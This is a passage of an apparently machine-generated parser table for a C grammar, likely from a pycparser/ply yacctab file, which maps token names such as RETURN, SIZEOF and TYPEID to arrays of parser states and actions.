00,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,145,-335,-28,-182,-27,145,-337,-87,-72,-337,145,-286,-285,145,145,-283,-287,-288,145,-284,145,145,145,-336,-183,145,145,-28,-337,145,-28,-337,-337,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,-337,-76,-79,-82,-75,145,-77,145,145,-81,-215,-214,-80,-216,145,-78,145,145,-69,-284,145,145,-284,145,145,-244,-247,-245,-241,-242,-246,-248,145,-250,-251,-243,-249,-12,145,145,-11,145,145,145,145,-234,-233,145,-231,145,145,-217,145,-230,145,-84,-218,145,145,145,-337,-337,-198,145,145,145,-337,-284,-229,-232,145,-221,145,-83,-219,-68,145,-28,-337,145,-11,145,145,-220,145,145,145,-284,145,145,145,-337,145,-225,-224,-222,-84,145,145,145,-226,-223,145,-228,-227,]),'TIMESEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,367,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'OR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,259,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,259,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,259,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SHORT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[2,-337,-113,-128,2,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,2,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,2,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,2,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,2,-131,-95,-101,-97,2,-53,-126,2,-88,2,2,-93,2,-147,-335,-146,2,-167,-166,-182,-100,-126,2,-87,-90,-94,-92,-61,-72,2,-144,-142,2,2,2,-73,2,-89,2,2,2,-149,-159,-160,-156,-336,2,-183,-30,2,2,-74,2,2,2,2,-174,-175,2,-143,-140,2,-141,-145,-76,-79,-82,-75,-77,2,-81,-215,-214,-80,-216,-78,-127,2,-153,2,-151,-148,-157,-168,-69,-36,-35,2,2,2,-234,-233,2,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,2,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'RETURN':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432
,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,290,-336,-76,-79,-82,-75,-77,290,-81,-215,-214,-80,-216,290,-78,-69,-234,-233,-231,290,-217,-230,290,-84,-218,290,-229,-232,-221,290,-83,-219,-68,290,-220,290,290,-225,-224,-222,-84,290,290,-226,-223,290,-228,-227,]),'RSHIFTEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,368,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'_ALIGNAS':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,109,111,118,119,123,124,129,142,147,174,177,180,181,182,184,185,186,187,188,189,190,191,192,200,211,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[8,8,-113,-128,8,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,8,-120,-115,-65,-102,8,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,8,8,-119,8,-114,-130,8,-118,-71,-103,8,-131,-96,-98,8,-131,-95,-101,-97,8,-53,8,8,-88,8,8,-147,-335,-146,8,-167,-166,-100,-126,8,-87,-61,-72,8,-144,-142,8,8,-73,8,-89,8,8,8,-149,-159,-160,-156,-336,8,-30,8,-74,8,8,8,8,-174,-175,8,-143,-140,8,-141,-145,-76,-79,-82,-75,-77,8,-81,-215,-214,-80,-216,-78,-127,8,-153,8,-151,-148,-157,-168,-69,-36,-35,8,8,8,-234,-233,8,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,8,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'RESTRICT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[39,39,-113,-128,39,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,39,-120,-115,-65,-102,39,-131,-108,-238,-111,39,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,39,39,-119,39,-114,-130,39,-118,-71,-103,39,-131,-96,-98,39,-131,-95,-101,-97,39,-53,39,39,-88,39,39,-147,-335,-146,39,-167,-166,39,-182,-100,-126,39,39,-87,-61,-72,39,39,-144,-142,39,39,39,-73,39,-89,39,39,39,-149,-159,-160,-156,-336,39,-183,-30,39,39,39,39,39,-74,39,39,39,39,-174,-175,39,-143,-140,39,-141,-145,39,-76,-79,-82,-75,-77,39,-81,-215,-214,-80,-216,-78,-127,39,-153,39,-151,-148,-157,-168,-69,-36,-35,39,39,39,-234,-233,39,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,39,39,-229,-232,-221,-83,-219,-68,-33,-32,39,39,-22
0,-225,-224,-222,-84,-226,-223,-228,-227,]),'STATIC':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,105,109,111,117,118,119,123,124,128,129,180,181,182,187,191,198,200,205,211,219,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,536,554,555,557,558,575,576,578,579,],[10,10,-113,-128,10,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,10,-120,-115,-65,-102,10,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,10,10,-119,10,-114,-130,10,-118,-71,-103,10,-131,-96,-98,10,-131,-95,-101,-97,-53,10,10,-88,10,-147,-335,-146,-167,-166,-182,-100,-126,206,10,-87,-61,-72,220,10,-73,10,-89,-149,-336,-183,-30,338,10,353,-74,-174,-175,10,-76,-79,-82,-75,-77,10,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,10,10,10,-234,-233,10,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,515,10,-229,-232,-221,-83,-219,-68,-33,-32,542,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'SIZEOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,146,-335,-28,-182,-27,146,-337,-87,-72,-337,146,-286,-285,146,146,-283,-287,-288,146,-284,146,146,146,-336,-183,146,146,-28,-337,146,-28,-337,-337,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,-337,-76,-79,-82,-75,146,-77,146,146,-81,-215,-214,-80,-216,146,-78,146,146,-69,-284,146,146,-284,146,146,-244,-247,-245,-241,-242,-246,-248,146,-250,-251,-243,-249,-12,146,146,-11,146,146,146,146,-234,-233,146,-231,146,146,-217,146,-230,146,-84,-218,146,146,146,-337,-337,-198,146,146,146,-337,-284,-229,-232,146,-221,146,-83,-219,-68,146,-28,-337,146,-11,146,146,-220,146,146,146,-284,146,146,146,-337,146,-225,-224,-222,-84,146,146,146,-226,-223,146,-228,-227,]),'UNSIGNED':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[22,-337,-113,-128,22,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,22,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,22,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,22,-118,-71,-103,-337,-9
,-131,-91,-10,-96,-98,22,-131,-95,-101,-97,22,-53,-126,22,-88,22,22,-93,22,-147,-335,-146,22,-167,-166,-182,-100,-126,22,-87,-90,-94,-92,-61,-72,22,-144,-142,22,22,22,-73,22,-89,22,22,22,-149,-159,-160,-156,-336,22,-183,-30,22,22,-74,22,22,22,22,-174,-175,22,-143,-140,22,-141,-145,-76,-79,-82,-75,-77,22,-81,-215,-214,-80,-216,-78,-127,22,-153,22,-151,-148,-157,-168,-69,-36,-35,22,22,22,-234,-233,22,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,22,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'UNION':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[28,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,28,-65,-102,-337,-131,-108,-63,-129,28,-29,-62,-70,-52,-337,-337,-337,-130,28,-71,-103,-337,-9,-131,-91,-10,28,28,-53,-337,-88,28,28,-93,28,-335,28,-182,28,-87,-90,-94,-92,-61,-72,28,28,28,-73,28,-89,28,28,28,-159,-160,-156,-336,-183,-30,28,-74,28,28,28,28,-174,-175,28,28,-76,-79,-82,-75,-77,28,-81,-215,-214,-80,-216,-78,-127,28,28,-157,-69,-36,-35,28,28,28,-234,-233,28,-231,-217,-230,-81,-84,-218,-158,-31,-34,28,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'COLON':([2,3,5,6,12,22,23,33,34,36,39,42,43,44,46,48,49,50,54,56,58,60,73,74,76,77,86,96,98,100,101,111,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,179,187,191,192,200,216,224,225,230,232,234,235,236,237,238,240,241,261,263,268,269,272,273,275,279,280,295,310,312,314,316,317,324,328,340,341,355,356,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,407,411,431,442,443,445,448,449,453,454,464,465,468,476,478,480,482,483,486,487,511,512,518,519,524,547,551,565,],[-113,-128,-124,-110,-125,-120,-115,-238,-111,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-54,-179,-131,-37,-53,-147,-146,-167,-166,-126,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-178,-149,-336,319,-30,-38,-274,-239,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,-235,-278,-140,-141,-145,429,440,-127,-153,-151,-148,447,-168,-36,-35,-44,-43,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,481,-270,-258,-296,-295,-294,-293,-292,-305,502,-152,-150,319,-170,-169,-31,-34,-39,-42,-240,-237,-281,-282,-290,-291,-236,-275,-33,-32,-41,-40,-254,-306,-299,-300,]),'$end':([0,9,14,16,17,19,25,38,45,47,57,59,61,119,123,124,180,191,223,332,439,510,],[-337,0,-64,-60,-67,-66,-65,-63,-62,-70,-59,-58,-71,-87,-61,-72,-73,-336,-74,-69,-218,-68,]),'WSTRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,37
7,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,148,-335,-28,-182,-27,148,-337,-87,-72,-337,148,-286,-285,-330,148,-327,148,-283,-287,237,-328,-288,-329,148,-284,148,148,148,-336,-183,148,148,-28,-337,148,-28,-337,-337,148,148,148,-334,-332,-331,-333,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,-337,-76,-79,-82,-75,148,-77,148,148,-81,-215,-214,-80,-216,148,-78,148,148,-69,-284,148,148,-284,148,148,-244,-247,-245,-241,-242,-246,-248,148,-250,-251,-243,-249,-12,148,148,-11,148,148,148,148,-234,-233,148,-231,148,148,-217,148,-230,148,-84,-218,148,148,148,-337,-337,-198,148,148,148,-337,-284,-229,-232,148,-221,148,-83,-219,-68,148,-28,-337,148,-11,148,148,-220,148,148,148,-284,148,148,148,-337,148,-225,-224,-222,-84,148,148,148,-226,-223,148,-228,-227,]),'DIVIDE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,252,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,252,252,252,252,252,252,252,252,252,252,-257,-256,252,252,252,252,252,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'FOR':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,292,-336,-76,-79,-82,-75,-77,292,-81,-215,-214,-80,-216,292,-78,-69,-234,-233,-231,292,-217,-230,292,-84,-218,292,-229,-232,-221,292,-83,-219,-68,292,-220,292,292,-225,-224,-222,-84,292,292,-226,-223,292,-228,-227,]),'PLUSPLUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,145,146,148,149,150,151,152,153,154,156,160,161,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,482,483,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,149,-335,-28,-182,-27,149,-337,-87,-72,-337,149,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-314,149,-327,149,-283,-287,-325,-304,-322,-302,-315,-289,-328,-316,-288,-329,-320,263,-323,149,-284,149,149,-312,149,-336,-183,149,149,-28,-337,149,-28,-337,-337,149,-326,149,149,-334,-332,-331,-333,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,-298,-297,149,149,-337,-76,-79,-82,-75,149,-77,149,149,-81,-215,-214,-80,-216,149,-78,-312,149,149,-69,-284,149,149,-284,149,149,-244,-247,-245,-241,-242,-24
6,-248,149,-250,-251,-243,-249,-12,149,149,-11,-296,-295,-294,-293,-292,-305,149,149,149,149,-234,-233,149,-231,149,149,-217,149,-230,149,-84,-218,149,149,149,-337,-337,-198,149,149,-290,-291,149,-337,-284,-229,-232,149,-221,149,-83,-219,-68,149,-28,-337,149,-11,149,149,-220,149,149,149,-284,149,149,-306,149,-337,-299,149,-225,-224,-222,-84,-300,149,149,149,-226,-223,149,-228,-227,]),'EQUALS':([42,48,73,74,75,77,78,86,110,127,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,179,191,197,200,216,224,230,232,234,235,236,237,238,261,263,268,273,310,340,341,355,356,371,376,402,403,404,405,407,411,453,454,464,465,470,474,478,480,482,483,487,511,512,518,519,520,547,551,565,],[-29,-52,-54,-179,-178,-37,131,-53,201,-55,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-178,-336,329,-30,-38,360,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-36,-35,-44,-43,-199,475,-296,-295,-294,-293,-292,-305,-31,-34,-39,-42,-202,-200,-281,-282,-290,-291,-275,-33,-32,-41,-40,-201,-306,-299,-300,]),'ELSE':([61,124,191,284,285,286,289,291,300,303,308,332,424,425,428,435,437,438,439,496,497,500,505,506,510,536,554,555,557,558,575,576,578,579,],[-71,-72,-336,-76,-79,-82,-75,-77,-81,-80,-78,-69,-234,-233,-231,-230,-81,-84,-218,-229,-232,-221,-83,-219,-68,-220,-225,-224,-222,569,-226,-223,-228,-227,]),'ANDEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,365,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'EQ':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,256,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,256,-262,-260,-264,-268,-263,-259,-266,256,-257,-256,-265,256,-267,256,256,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'AND':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-
129,-130,-71,-131,150,-335,-28,-182,-27,150,-337,-87,-72,-337,150,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,150,-327,150,-283,-287,-325,-304,-322,-302,-255,-315,-289,257,-328,-316,-288,-329,-320,-276,-323,150,-284,150,150,-312,150,-336,-183,150,150,-28,-337,150,-28,-337,-274,-337,150,-326,150,-280,150,-277,-334,-332,-331,-333,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,-298,-297,150,150,-279,-278,-337,-76,-79,-82,-75,150,-77,150,150,-81,-215,-214,-80,-216,150,-78,-312,150,150,-69,-284,150,150,-284,150,150,-244,-247,-245,-241,-242,-246,-248,150,-250,-251,-243,-249,-12,150,150,-11,-261,257,-262,-260,-264,-268,-263,-259,-266,257,-257,-256,-265,257,-267,-269,257,-258,-296,-295,-294,-293,-292,-305,150,150,150,150,-234,-233,150,-231,150,150,-217,150,-230,150,-84,-218,150,150,150,-337,-337,-198,150,-281,-282,150,-290,-291,150,-275,-337,-284,-229,-232,150,-221,150,-83,-219,-68,150,-28,-337,150,-11,150,150,-220,150,150,150,-284,150,150,-306,150,-337,-299,150,-225,-224,-222,-84,-300,150,150,150,-226,-223,150,-228,-227,]),'TYPEID':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,103,104,105,106,109,111,118,119,120,121,122,123,124,126,129,142,147,172,174,180,181,182,184,185,186,187,188,189,190,191,192,198,199,200,202,211,214,223,229,231,233,239,240,241,262,264,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,344,350,422,424,425,427,428,432,435,437,438,439,442,443,445,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[33,-337,-113,-128,77,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,33,-120,-115,-154,-65,-102,-126,-155,-131,-108,96,100,-238,-111,-337,-122,-63,-129,33,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,33,-118,-71,-103,-337,-9,-131,-91,-10,-96,77,-98,77,33,-131,-95,-101,-97,33,-53,-126,77,-88,33,33,-93,33,-147,-335,-146,33,-167,-166,-28,-180,-182,-27,-100,-126,33,-87,-90,-94,-92,-61,-72,77,33,-144,-142,33,33,-73,33,-89,33,33,33,-149,-159,-160,-156,-336,77,-183,-181,-30,77,347,33,-74,33,33,33,33,-174,-175,402,404,33,-143,-140,33,-141,-145,-76,-79,-82,-75,-77,33,-81,-215,-214,-80,-216,-78,-127,33,-153,33,-151,-148,-157,-168,-69,-36,-35,33,347,33,33,-234,-233,33,-231,-217,-230,-81,-84,-218,-152,-150,77,-158,-170,-169,-31,-34,33,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LBRACE':([21,24,28,31,32,42,48,61,75,86,88,90,92,93,96,97,98,100,101,119,124,130,131,181,182,191,200,201,227,229,284,285,286,289,291,298,300,301,302,303,305,307,308,332,340,341,369,375,377,413,424,425,428,429,432,435,437,438,439,440,453,454,472,475,477,478,479,488,496,497,500,502,505,506,510,511,512,521,522,535,536,537,539,550,554,555,557,558,569,574,575,576,577,578,579,],[-337,-154,-155,97,97,-29,-52,-71,-337,-53,-7,-88,97,-8,97,-335,97,97,97,-87,-72,97,97,97,-89,-336,-30,97,-337,97,-76,-79,-82,-75,-77,97,-81,-215,-214,-80,-216,97,-78,-69,-36,-35,-12,97,-11,97,-234,-233,-231,97,-217,-230,97,-84,-218,97,-31,-34,-337,-198,97,97,97,-337,-229,-232,-221,97,-83,-219,-68,-33,-32,97,-11,97,-220,97,97,-337,-225,-224,-222,-84,97,97,-226,-223,97,-228,-227,]),'PPHASH':([0,14,16,17,19,25,38,45,47,59,61,119,123,124,180,191,223,332,439,510,],[47,-64,-60,-67,-66,-65,-63,-62,-70,47,-71,-87,-61,-72,-73,
-336,-74,-69,-218,-68,]),'INT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[56,-337,-113,-128,56,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,56,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,56,-29,-121,-116,-62,